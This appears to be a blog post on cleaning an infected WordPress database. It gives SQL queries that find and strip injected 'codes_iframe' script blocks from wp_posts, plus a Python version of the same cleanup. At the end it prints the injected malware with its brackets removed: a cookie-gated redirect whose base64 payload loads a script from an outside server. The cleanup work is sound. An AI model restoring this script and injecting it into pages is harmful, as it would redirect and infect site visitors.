WordPress sites being attacked, malicious JavaScript code appended to posts

Lately I have observed several of my WordPress sites going down.

Symptoms include:
* certain posts do not load
* the antivirus program flags the page as containing malicious code
* the WordPress admin page loads and the posts can be edited. However, in the HTML view the malicious code can be seen: it starts with <!--codes_iframe--> <script> and ends with </script> <!--/codes_iframe-->


To resolve this, I logged on to the MySQL CLI and searched the database for the malicious code. I found it in the wp_posts table, in the post_content column. However, that column also holds the body of each post, so it cannot simply be cleared.

The logical approach to removing the malicious code was therefore to delete everything from <!--codes_iframe--> up to and including <!--/codes_iframe-->.

BitDefender shows the page as: Threat name: JS:Trojan.Cryxos.1952

Use LOCATE() to find where the injected block starts and ends in each row (0 means the marker is not present in that post):



mysql> SELECT LOCATE('<!--codes_iframe-->', post_content) as start from wp_posts;
+-------+
| start |
+-------+
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 11986 |
| 0 |
| 0 |
| 0 |
| 7735 |
| 0 |
| 0 |
| 0 |
| 8848 |
| 0 |
| 2667 |
| 0 |
| 2580 |
| 0 |
| 3287 |
| 0 |
| 1695 |
| 0 |
| 3353 |
| 0 |
| 5332 |
| 0 |
| 3399 |
| 0 |
| 1963 |
| 0 |
| 1 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2190 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 1789 |
| 0 |
| 0 |
| 0 |
| 5109 |
| 0 |
| 0 |
| 5294 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3493 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3280 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2184 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 25 |
| 796 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 734 |
| 0 |
| 309 |
| 0 |
| 308 |
| 0 |
| 0 |
| 2615 |
| 0 |
| 0 |
| 0 |
| 0 |
| 1848 |
| 0 |
| 2916 |
| 0 |
| 0 |
| 437 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2793 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2160 |
| 0 |
| 604 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 1779 |
| 0 |
| 846 |
| 0 |
| 7571 |
| 0 |
| 0 |
| 0 |
| 1685 |
| 0 |
| 1595 |
| 0 |
| 1595 |
| 7571 |
| 846 |
| 1779 |
| 604 |
| 2160 |
| 2793 |
| 2916 |
| 1848 |
| 2615 |
| 308 |
| 309 |
| 1161 |
| 1685 |
| 437 |
| 796 |
| 25 |
| 734 |
| 2184 |
| 3280 |
| 3493 |
| 5294 |
| 5109 |
| 1789 |
| 1 |
| 1963 |
| 3399 |
| 5332 |
| 3353 |
| 1695 |
| 3287 |
| 2190 |
| 2580 |
| 2667 |
| 8848 |
| 7735 |
| 11986 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 7584 |
+-------+
364 rows in set (0.01 sec)


mysql> SELECT LOCATE('<!--/codes_iframe-->', post_content) as end from wp_posts;
+-------+
| end   |
+-------+
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 12815 |
| 0 |
| 0 |
| 0 |
| 8564 |
| 0 |
| 0 |
| 0 |
| 9677 |
| 0 |
| 3496 |
| 0 |
| 3409 |
| 0 |
| 4116 |
| 0 |
| 2524 |
| 0 |
| 4182 |
| 0 |
| 6161 |
| 0 |
| 4228 |
| 0 |
| 2792 |
| 0 |
| 830 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3019 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2618 |
| 0 |
| 0 |
| 0 |
| 5938 |
| 0 |
| 0 |
| 6123 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 4322 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 4109 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3013 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 854 |
| 1625 |
| 0 |
| 0 |
| 0 |
| 1182 |
| 0 |
| 0 |
| 1563 |
| 0 |
| 1138 |
| 0 |
| 1137 |
| 0 |
| 0 |
| 3444 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2677 |
| 0 |
| 3745 |
| 0 |
| 0 |
| 1266 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 3622 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2989 |
| 0 |
| 1433 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 0 |
| 2608 |
| 0 |
| 1675 |
| 0 |
| 8400 |
| 0 |
| 0 |
| 0 |
| 2514 |
| 0 |
| 2424 |
| 0 |
| 2424 |
| 8400 |
| 1675 |
| 2608 |
| 1433 |
| 2989 |
| 3622 |
| 3745 |
| 2677 |
| 3444 |
| 1137 |
| 1138 |
| 1990 |
| 2514 |
| 1266 |
| 1625 |
| 854 |
| 1563 |
| 3013 |
| 4109 |
| 4322 |
| 6123 |
| 5938 |
| 2618 |
| 830 |
| 2792 |
| 4228 |
| 6161 |
| 4182 |
| 2524 |
| 4116 |
| 3019 |
| 3409 |
| 3496 |
| 9677 |
| 8564 |
| 12815 |
| 0 |
| 0 |
| 0 |
| 1161 |
| 1182 |
| 8413 |
+-------+
364 rows in set (0.00 sec)

I used the query below to clear them from the database. It keeps everything before the start marker, skips the injected block, and keeps everything after the end marker:

UPDATE wp_posts SET post_content = CONCAT(
SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1),
SUBSTRING(post_content, LOCATE('<!--/codes_iframe-->', post_content)+LENGTH('<!--/codes_iframe-->')))
WHERE LOCATE('<!--codes_iframe-->', post_content) > 0;




mysql> UPDATE wp_posts SET post_content = CONCAT(
-> SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1),
-> SUBSTRING(post_content, LOCATE('<!--/codes_iframe-->', post_content)+LENGTH('<!--/codes_iframe-->')))
-> WHERE LOCATE('<!--codes_iframe-->', post_content) > 0;
Query OK, 74 rows affected (0.05 sec)
Rows matched: 74 Changed: 74 Warnings: 0

Logged back on and confirmed that no other data was missing.

PS: Do take a backup of the database before attempting to make these changes!
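As an added example (not the post author's code), here is the same locate-and-strip logic in Python, run over constructed sample rows instead of a live wp_posts table. It goes beyond the single UPDATE above in two ways: it removes every injected block in a post rather than only the first occurrence, and it refuses to modify a post whose start marker has no matching end marker, because the substring arithmetic in the UPDATE (whose WHERE clause checks only the start marker) would produce a corrupted row rather than a clean one in that case. The Post and CleanResult types and the function names are this example's own.

```python
import re
from dataclasses import dataclass

# Markers that delimit the injected block, as seen in the post's HTML view.
START_MARKER = "<!--codes_iframe-->"
END_MARKER = "<!--/codes_iframe-->"

# One whole injected block, start marker to end marker, shortest match,
# spanning newlines so multi-line <script> bodies are covered.
INJECTED_BLOCK = re.compile(
    re.escape(START_MARKER) + r".*?" + re.escape(END_MARKER), re.DOTALL
)


@dataclass
class Post:
    id: int
    post_content: str


@dataclass
class CleanResult:
    id: int
    removed: int          # number of injected blocks stripped from this post
    unpaired: bool        # a marker was left without its partner; row untouched
    post_content: str


def locate_markers(content: str):
    """Mirror of the two LOCATE() queries: 1-based positions, 0 if absent."""
    s = content.find(START_MARKER)
    e = content.find(END_MARKER)
    return (s + 1 if s >= 0 else 0, e + 1 if e >= 0 else 0)


def clean_post(post: Post) -> CleanResult:
    """Strip every start..end block; leave the row alone if markers don't pair."""
    cleaned, n = INJECTED_BLOCK.subn("", post.post_content)
    # Anything left over means a lone start or end marker: do not guess.
    if START_MARKER in cleaned or END_MARKER in cleaned:
        return CleanResult(post.id, 0, True, post.post_content)
    return CleanResult(post.id, n, False, cleaned)


def clean_posts(posts):
    return [clean_post(p) for p in posts]


def affected_ids(posts):
    """IDs that the LOCATE(start) > 0 check would report, for a before/after tally."""
    return [p.id for p in posts if locate_markers(p.post_content)[0] > 0]


# Constructed sample rows (not data from the infected sites).
SAMPLE_POSTS = [
    Post(1, "<p>Clean post, nothing to do.</p>"),
    Post(2, "<p>Hello</p>" + START_MARKER + "<script>/*payload*/</script>"
            + END_MARKER + "<p>Bye</p>"),
    Post(3, START_MARKER + "<script>a</script>" + END_MARKER + "<p>x</p>"
            + START_MARKER + "<script>b</script>" + END_MARKER),
    Post(4, "<p>Truncated</p>" + START_MARKER + "<script>c</script>"),
]

if __name__ == "__main__":
    print("affected before cleanup:", affected_ids(SAMPLE_POSTS))
    for r in clean_posts(SAMPLE_POSTS):
        status = "UNPAIRED MARKER, skipped" if r.unpaired else f"removed {r.removed}"
        print(f"post {r.id}: {status}: {r.post_content!r}")
```

Run it as-is to see the per-row report; to use it against a real export, replace SAMPLE_POSTS with rows read from wp_posts and write back only the results where unpaired is False, after taking the backup the author recommends. Posts reported as unpaired are the ones to inspect by hand.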

Malicious code (angle brackets and parentheses removed so that it cannot infect the pages again). It sets a "redirect" cookie with a 24-hour expiry and then writes a second script tag whose source is a base64-encoded data: URI:

!–codes_iframe– script type=\”text/javascript\” function getCookie e {var U=document.cookie.match new RegExp \” ?:^|; \”+e.replace / [\.$?|{}\ \ \[\]\\\/\+^] /g,\”\\$1\” +\”= [^;] \” ;return U?decodeURIComponent U[1] :void 0}var src=\”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\”,now=Math.floor Date.now /1e3 ,cookie=getCookie \”redirect\” ;if now = time=cookie ||void 0===time {var time=Math.floor Date.now /1e3+86400 ,date=new Date new Date .getTime +86400 ;document.cookie=\”redirect=\”+time+\”; path=/; expires=\”+date.toGMTString ,document.write \’ script src=\”\’+src+\’\” \/script \’ } /script !–/codes_iframe–
